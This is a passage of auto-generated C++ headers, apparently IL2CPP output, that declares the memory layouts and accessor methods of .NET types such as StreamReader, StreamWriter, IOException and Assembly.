__clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.NumberStyles struct NumberStyles_tB0ADA2D9CCAA236331AED14C42BE5832B2351592 { public: // System.Int32 System.Globalization.NumberStyles::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(NumberStyles_tB0ADA2D9CCAA236331AED14C42BE5832B2351592, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // NUMBERSTYLES_TB0ADA2D9CCAA236331AED14C42BE5832B2351592_H #ifndef FILEACCESS_T31950F3A853EAE886AC8F13EA7FC03A3EB46E3F6_H #define FILEACCESS_T31950F3A853EAE886AC8F13EA7FC03A3EB46E3F6_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.FileAccess struct FileAccess_t31950F3A853EAE886AC8F13EA7FC03A3EB46E3F6 { public: // System.Int32 System.IO.FileAccess::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(FileAccess_t31950F3A853EAE886AC8F13EA7FC03A3EB46E3F6, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // FILEACCESS_T31950F3A853EAE886AC8F13EA7FC03A3EB46E3F6_H #ifndef IOEXCEPTION_T60E052020EDE4D3075F57A1DCC224FF8864354BA_H #define IOEXCEPTION_T60E052020EDE4D3075F57A1DCC224FF8864354BA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.IOException struct IOException_t60E052020EDE4D3075F57A1DCC224FF8864354BA : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: // System.String System.IO.IOException::_maybeFullPath String_t* ____maybeFullPath_17; public: inline static int32_t get_offset_of__maybeFullPath_17() { return static_cast<int32_t>(offsetof(IOException_t60E052020EDE4D3075F57A1DCC224FF8864354BA, ____maybeFullPath_17)); } inline String_t* get__maybeFullPath_17() const { return ____maybeFullPath_17; } inline String_t** get_address_of__maybeFullPath_17() { return &____maybeFullPath_17; } inline void set__maybeFullPath_17(String_t* value) { ____maybeFullPath_17 = value; Il2CppCodeGenWriteBarrier((&____maybeFullPath_17), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // IOEXCEPTION_T60E052020EDE4D3075F57A1DCC224FF8864354BA_H #ifndef STREAMREADER_T62E68063760DCD2FC036AE132DE69C24B7ED001E_H #define STREAMREADER_T62E68063760DCD2FC036AE132DE69C24B7ED001E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.StreamReader struct StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E : public TextReader_t7DF8314B601D202ECFEDF623093A87BFDAB58D0A { public: // System.IO.Stream System.IO.StreamReader::stream Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream_5; // System.Text.Encoding System.IO.StreamReader::encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding_6; // System.Text.Decoder System.IO.StreamReader::decoder Decoder_tEEF45EB6F965222036C49E8EC6BA8A0692AA1F26 * ___decoder_7; // System.Byte[] System.IO.StreamReader::byteBuffer ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___byteBuffer_8; // System.Char[] System.IO.StreamReader::charBuffer CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___charBuffer_9; // System.Byte[] System.IO.StreamReader::_preamble ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ____preamble_10; // System.Int32 System.IO.StreamReader::charPos int32_t ___charPos_11; // System.Int32 System.IO.StreamReader::charLen int32_t ___charLen_12; // System.Int32 System.IO.StreamReader::byteLen int32_t ___byteLen_13; // System.Int32 System.IO.StreamReader::bytePos int32_t ___bytePos_14; // System.Int32 System.IO.StreamReader::_maxCharsPerBuffer int32_t ____maxCharsPerBuffer_15; // System.Boolean System.IO.StreamReader::_detectEncoding bool ____detectEncoding_16; // System.Boolean System.IO.StreamReader::_checkPreamble bool ____checkPreamble_17; // System.Boolean System.IO.StreamReader::_isBlocked bool ____isBlocked_18; // System.Boolean System.IO.StreamReader::_closable bool ____closable_19; // System.Threading.Tasks.Task modreq(System.Runtime.CompilerServices.IsVolatile) System.IO.StreamReader::_asyncReadTask Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * ____asyncReadTask_20; public: inline static int32_t get_offset_of_stream_5() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___stream_5)); } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * get_stream_5() const { return ___stream_5; } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 ** get_address_of_stream_5() { return &___stream_5; } inline void set_stream_5(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * value) { ___stream_5 = value; Il2CppCodeGenWriteBarrier((&___stream_5), value); } inline static int32_t get_offset_of_encoding_6() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___encoding_6)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_encoding_6() const { return ___encoding_6; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_encoding_6() { return &___encoding_6; } inline void set_encoding_6(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___encoding_6 = value; Il2CppCodeGenWriteBarrier((&___encoding_6), value); } inline static int32_t get_offset_of_decoder_7() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___decoder_7)); } inline Decoder_tEEF45EB6F965222036C49E8EC6BA8A0692AA1F26 * get_decoder_7() const { return ___decoder_7; } inline Decoder_tEEF45EB6F965222036C49E8EC6BA8A0692AA1F26 ** get_address_of_decoder_7() { return &___decoder_7; } inline void set_decoder_7(Decoder_tEEF45EB6F965222036C49E8EC6BA8A0692AA1F26 * value) { ___decoder_7 = value; Il2CppCodeGenWriteBarrier((&___decoder_7), value); } inline static int32_t get_offset_of_byteBuffer_8() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___byteBuffer_8)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_byteBuffer_8() const { return ___byteBuffer_8; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_byteBuffer_8() { return &___byteBuffer_8; } inline void set_byteBuffer_8(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___byteBuffer_8 = value; Il2CppCodeGenWriteBarrier((&___byteBuffer_8), value); } inline static int32_t get_offset_of_charBuffer_9() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___charBuffer_9)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_charBuffer_9() const { return ___charBuffer_9; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_charBuffer_9() { return &___charBuffer_9; } inline void set_charBuffer_9(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___charBuffer_9 = value; Il2CppCodeGenWriteBarrier((&___charBuffer_9), value); } inline static int32_t get_offset_of__preamble_10() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____preamble_10)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get__preamble_10() const { return ____preamble_10; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of__preamble_10() { return &____preamble_10; } inline void set__preamble_10(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ____preamble_10 = value; Il2CppCodeGenWriteBarrier((&____preamble_10), value); } inline static int32_t get_offset_of_charPos_11() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___charPos_11)); } inline int32_t get_charPos_11() const { return ___charPos_11; } inline int32_t* get_address_of_charPos_11() { return &___charPos_11; } inline void set_charPos_11(int32_t value) { ___charPos_11 = value; } inline static int32_t get_offset_of_charLen_12() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___charLen_12)); } inline int32_t get_charLen_12() const { return ___charLen_12; } inline int32_t* get_address_of_charLen_12() { return &___charLen_12; } inline void set_charLen_12(int32_t value) { ___charLen_12 = value; } inline static int32_t get_offset_of_byteLen_13() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___byteLen_13)); } inline int32_t get_byteLen_13() const { return ___byteLen_13; } inline int32_t* get_address_of_byteLen_13() { return &___byteLen_13; } inline void set_byteLen_13(int32_t value) { ___byteLen_13 = value; } inline static int32_t get_offset_of_bytePos_14() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ___bytePos_14)); } inline int32_t get_bytePos_14() const { return ___bytePos_14; } inline int32_t* get_address_of_bytePos_14() { return &___bytePos_14; } inline void set_bytePos_14(int32_t value) { ___bytePos_14 = value; } inline static int32_t get_offset_of__maxCharsPerBuffer_15() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____maxCharsPerBuffer_15)); } inline int32_t get__maxCharsPerBuffer_15() const { return ____maxCharsPerBuffer_15; } inline int32_t* get_address_of__maxCharsPerBuffer_15() { return &____maxCharsPerBuffer_15; } inline void set__maxCharsPerBuffer_15(int32_t value) { ____maxCharsPerBuffer_15 = value; } inline static int32_t get_offset_of__detectEncoding_16() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____detectEncoding_16)); } inline bool get__detectEncoding_16() const { return ____detectEncoding_16; } inline bool* get_address_of__detectEncoding_16() { return &____detectEncoding_16; } inline void set__detectEncoding_16(bool value) { ____detectEncoding_16 = value; } inline static int32_t get_offset_of__checkPreamble_17() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____checkPreamble_17)); } inline bool get__checkPreamble_17() const { return ____checkPreamble_17; } inline bool* get_address_of__checkPreamble_17() { return &____checkPreamble_17; } inline void set__checkPreamble_17(bool value) { ____checkPreamble_17 = value; } inline static int32_t get_offset_of__isBlocked_18() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____isBlocked_18)); } inline bool get__isBlocked_18() const { return ____isBlocked_18; } inline bool* get_address_of__isBlocked_18() { return &____isBlocked_18; } inline void set__isBlocked_18(bool value) { ____isBlocked_18 = value; } inline static int32_t get_offset_of__closable_19() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____closable_19)); } inline bool get__closable_19() const { return ____closable_19; } inline bool* get_address_of__closable_19() { return &____closable_19; } inline void set__closable_19(bool value) { ____closable_19 = value; } inline static int32_t get_offset_of__asyncReadTask_20() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E, ____asyncReadTask_20)); } inline Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * get__asyncReadTask_20() const { return ____asyncReadTask_20; } inline Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 ** get_address_of__asyncReadTask_20() { return &____asyncReadTask_20; } inline void set__asyncReadTask_20(Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * value) { ____asyncReadTask_20 = value; Il2CppCodeGenWriteBarrier((&____asyncReadTask_20), value); } }; struct StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E_StaticFields { public: // System.IO.StreamReader System.IO.StreamReader::Null StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * ___Null_4; public: inline static int32_t get_offset_of_Null_4() { return static_cast<int32_t>(offsetof(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E_StaticFields, ___Null_4)); } inline StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * get_Null_4() const { return ___Null_4; } inline StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E ** get_address_of_Null_4() { return &___Null_4; } inline void set_Null_4(StreamReader_t62E68063760DCD2FC036AE132DE69C24B7ED001E * value) { ___Null_4 = value; Il2CppCodeGenWriteBarrier((&___Null_4), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STREAMREADER_T62E68063760DCD2FC036AE132DE69C24B7ED001E_H #ifndef STREAMWRITER_T989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_H #define STREAMWRITER_T989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IO.StreamWriter struct StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E : public TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 { public: // System.IO.Stream System.IO.StreamWriter::stream Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * ___stream_12; // System.Text.Encoding System.IO.StreamWriter::encoding Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ___encoding_13; // System.Text.Encoder System.IO.StreamWriter::encoder Encoder_t29B2697B0B775EABC52EBFB914F327BE9B1A3464 * ___encoder_14; // System.Byte[] System.IO.StreamWriter::byteBuffer ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___byteBuffer_15; // System.Char[] System.IO.StreamWriter::charBuffer CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___charBuffer_16; // System.Int32 System.IO.StreamWriter::charPos int32_t ___charPos_17; // System.Int32 System.IO.StreamWriter::charLen int32_t ___charLen_18; // System.Boolean System.IO.StreamWriter::autoFlush bool ___autoFlush_19; // System.Boolean System.IO.StreamWriter::haveWrittenPreamble bool ___haveWrittenPreamble_20; // System.Boolean System.IO.StreamWriter::closable bool ___closable_21; // System.Threading.Tasks.Task modreq(System.Runtime.CompilerServices.IsVolatile) System.IO.StreamWriter::_asyncWriteTask Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * ____asyncWriteTask_22; public: inline static int32_t get_offset_of_stream_12() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___stream_12)); } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * get_stream_12() const { return ___stream_12; } inline Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 ** get_address_of_stream_12() { return &___stream_12; } inline void set_stream_12(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * value) { ___stream_12 = value; Il2CppCodeGenWriteBarrier((&___stream_12), value); } inline static int32_t get_offset_of_encoding_13() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___encoding_13)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get_encoding_13() const { return ___encoding_13; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of_encoding_13() { return &___encoding_13; } inline void set_encoding_13(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ___encoding_13 = value; Il2CppCodeGenWriteBarrier((&___encoding_13), value); } inline static int32_t get_offset_of_encoder_14() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___encoder_14)); } inline Encoder_t29B2697B0B775EABC52EBFB914F327BE9B1A3464 * get_encoder_14() const { return ___encoder_14; } inline Encoder_t29B2697B0B775EABC52EBFB914F327BE9B1A3464 ** get_address_of_encoder_14() { return &___encoder_14; } inline void set_encoder_14(Encoder_t29B2697B0B775EABC52EBFB914F327BE9B1A3464 * value) { ___encoder_14 = value; Il2CppCodeGenWriteBarrier((&___encoder_14), value); } inline static int32_t get_offset_of_byteBuffer_15() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___byteBuffer_15)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_byteBuffer_15() const { return ___byteBuffer_15; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_byteBuffer_15() { return &___byteBuffer_15; } inline void set_byteBuffer_15(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___byteBuffer_15 = value; Il2CppCodeGenWriteBarrier((&___byteBuffer_15), value); } inline static int32_t get_offset_of_charBuffer_16() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___charBuffer_16)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_charBuffer_16() const { return ___charBuffer_16; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_charBuffer_16() { return &___charBuffer_16; } inline void set_charBuffer_16(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___charBuffer_16 = value; Il2CppCodeGenWriteBarrier((&___charBuffer_16), value); } inline static int32_t get_offset_of_charPos_17() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___charPos_17)); } inline int32_t get_charPos_17() const { return ___charPos_17; } inline int32_t* get_address_of_charPos_17() { return &___charPos_17; } inline void set_charPos_17(int32_t value) { ___charPos_17 = value; } inline static int32_t get_offset_of_charLen_18() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___charLen_18)); } inline int32_t get_charLen_18() const { return ___charLen_18; } inline int32_t* get_address_of_charLen_18() { return &___charLen_18; } inline void set_charLen_18(int32_t value) { ___charLen_18 = value; } inline static int32_t get_offset_of_autoFlush_19() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___autoFlush_19)); } inline bool get_autoFlush_19() const { return ___autoFlush_19; } inline bool* get_address_of_autoFlush_19() { return &___autoFlush_19; } inline void set_autoFlush_19(bool value) { ___autoFlush_19 = value; } inline static int32_t get_offset_of_haveWrittenPreamble_20() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___haveWrittenPreamble_20)); } inline bool get_haveWrittenPreamble_20() const { return ___haveWrittenPreamble_20; } inline bool* get_address_of_haveWrittenPreamble_20() { return &___haveWrittenPreamble_20; } inline void set_haveWrittenPreamble_20(bool value) { ___haveWrittenPreamble_20 = value; } inline static int32_t get_offset_of_closable_21() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ___closable_21)); } inline bool get_closable_21() const { return ___closable_21; } inline bool* get_address_of_closable_21() { return &___closable_21; } inline void set_closable_21(bool value) { ___closable_21 = value; } inline static int32_t get_offset_of__asyncWriteTask_22() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E, ____asyncWriteTask_22)); } inline Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * get__asyncWriteTask_22() const { return ____asyncWriteTask_22; } inline Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 ** get_address_of__asyncWriteTask_22() { return &____asyncWriteTask_22; } inline void set__asyncWriteTask_22(Task_t1F48C203E163126EBC69ACCA679D1A462DEE9EB2 * value) { ____asyncWriteTask_22 = value; Il2CppCodeGenWriteBarrier((&____asyncWriteTask_22), value); } }; struct StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_StaticFields { public: // System.IO.StreamWriter System.IO.StreamWriter::Null StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E * ___Null_11; // System.Text.Encoding modreq(System.Runtime.CompilerServices.IsVolatile) System.IO.StreamWriter::_UTF8NoBOM Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * ____UTF8NoBOM_23; public: inline static int32_t get_offset_of_Null_11() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_StaticFields, ___Null_11)); } inline StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E * get_Null_11() const { return ___Null_11; } inline StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E ** get_address_of_Null_11() { return &___Null_11; } inline void set_Null_11(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E * value) { ___Null_11 = value; Il2CppCodeGenWriteBarrier((&___Null_11), value); } inline static int32_t get_offset_of__UTF8NoBOM_23() { return static_cast<int32_t>(offsetof(StreamWriter_t989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_StaticFields, ____UTF8NoBOM_23)); } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * get__UTF8NoBOM_23() const { return ____UTF8NoBOM_23; } inline Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 ** get_address_of__UTF8NoBOM_23() { return &____UTF8NoBOM_23; } inline void set__UTF8NoBOM_23(Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * value) { ____UTF8NoBOM_23 = value; Il2CppCodeGenWriteBarrier((&____UTF8NoBOM_23), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // STREAMWRITER_T989B894EF3BFCDF6FF5F5F068402A4F835FC8E8E_H #ifndef INVALIDCASTEXCEPTION_T91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_H #define INVALIDCASTEXCEPTION_T91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.InvalidCastException struct InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INVALIDCASTEXCEPTION_T91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_H #ifndef INVALIDOPERATIONEXCEPTION_T0530E734D823F78310CAFAFA424CA5164D93A1F1_H #define INVALIDOPERATIONEXCEPTION_T0530E734D823F78310CAFAFA424CA5164D93A1F1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.InvalidOperationException struct InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INVALIDOPERATIONEXCEPTION_T0530E734D823F78310CAFAFA424CA5164D93A1F1_H #ifndef NOTSUPPORTEDEXCEPTION_TE75B318D6590A02A5D9B29FD97409B1750FA0010_H #define NOTSUPPORTEDEXCEPTION_TE75B318D6590A02A5D9B29FD97409B1750FA0010_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.NotSupportedException struct NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // NOTSUPPORTEDEXCEPTION_TE75B318D6590A02A5D9B29FD97409B1750FA0010_H #ifndef OUTOFMEMORYEXCEPTION_T2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7_H #define OUTOFMEMORYEXCEPTION_T2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.OutOfMemoryException struct OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7 : public SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // OUTOFMEMORYEXCEPTION_T2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7_H #ifndef PARSEFAILUREKIND_T7AA13E4F55CF635AED825E165124FCDC002DBB0C_H #define PARSEFAILUREKIND_T7AA13E4F55CF635AED825E165124FCDC002DBB0C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ParseFailureKind struct ParseFailureKind_t7AA13E4F55CF635AED825E165124FCDC002DBB0C { public: // System.Int32 System.ParseFailureKind::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ParseFailureKind_t7AA13E4F55CF635AED825E165124FCDC002DBB0C, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // PARSEFAILUREKIND_T7AA13E4F55CF635AED825E165124FCDC002DBB0C_H #ifndef PARSEFLAGS_T84469315FBC8714D1FEFE9732A53AEDE3D8B6587_H #define PARSEFLAGS_T84469315FBC8714D1FEFE9732A53AEDE3D8B6587_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ParseFlags struct ParseFlags_t84469315FBC8714D1FEFE9732A53AEDE3D8B6587 { public: // System.Int32 System.ParseFlags::value__ int32_t ___value___2; public: inline static int32_t get_offset_of_value___2() { return static_cast<int32_t>(offsetof(ParseFlags_t84469315FBC8714D1FEFE9732A53AEDE3D8B6587, ___value___2)); } inline int32_t get_value___2() const { return ___value___2; } inline int32_t* get_address_of_value___2() { return &___value___2; } inline void set_value___2(int32_t value) { ___value___2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // PARSEFLAGS_T84469315FBC8714D1FEFE9732A53AEDE3D8B6587_H #ifndef ASSEMBLY_T_H #define ASSEMBLY_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Reflection.Assembly struct Assembly_t : public RuntimeObject { public: // System.IntPtr System.Reflection.Assembly::_mono_assembly intptr_t ____mono_assembly_0; // System.Reflection.Assembly/ResolveEventHolder System.Reflection.Assembly::resolve_event_holder ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E * ___resolve_event_holder_1; // System.Object System.Reflection.Assembly::_evidence RuntimeObject * ____evidence_2; // System.Object System.Reflection.Assembly::_minimum RuntimeObject * ____minimum_3; // System.Object System.Reflection.Assembly::_optional RuntimeObject * ____optional_4; // System.Object System.Reflection.Assembly::_refuse RuntimeObject * ____refuse_5; // System.Object System.Reflection.Assembly::_granted RuntimeObject * ____granted_6; // System.Object System.Reflection.Assembly::_denied RuntimeObject * ____denied_7; // System.Boolean System.Reflection.Assembly::fromByteArray bool ___fromByteArray_8; // System.String System.Reflection.Assembly::assemblyName String_t* ___assemblyName_9; public: inline static int32_t get_offset_of__mono_assembly_0() { return static_cast<int32_t>(offsetof(Assembly_t, ____mono_assembly_0)); } inline intptr_t get__mono_assembly_0() const { return ____mono_assembly_0; } inline intptr_t* get_address_of__mono_assembly_0() { return &____mono_assembly_0; } inline void set__mono_assembly_0(intptr_t value) { ____mono_assembly_0 = value; } inline static int32_t get_offset_of_resolve_event_holder_1() { return static_cast<int32_t>(offsetof(Assembly_t, ___resolve_event_holder_1)); } inline ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E * get_resolve_event_holder_1() const { return ___resolve_event_holder_1; } inline ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E ** get_address_of_resolve_event_holder_1() { return &___resolve_event_holder_1; } inline void set_resolve_event_holder_1(ResolveEventHolder_t5267893EB7CB9C12F7B9B463FD4C221BEA03326E * value) { ___resolve_event_holder_1 = value; Il2CppCodeGenWriteBarrier((&___resolve_event_holder_1), value); } inline static int32_t get_offset_of__evidence_2() { return static_cast<int32_t>(offsetof(Assembly_t, ____evidence_2)); } inline RuntimeObject * get__evidence_2() const { return ____evidence_2; } inline RuntimeObject ** get_address_of__evidence_2() { return &____evidence_2; } inline void set__evidence_2(RuntimeObject * value) { ____evidence_2 = value; 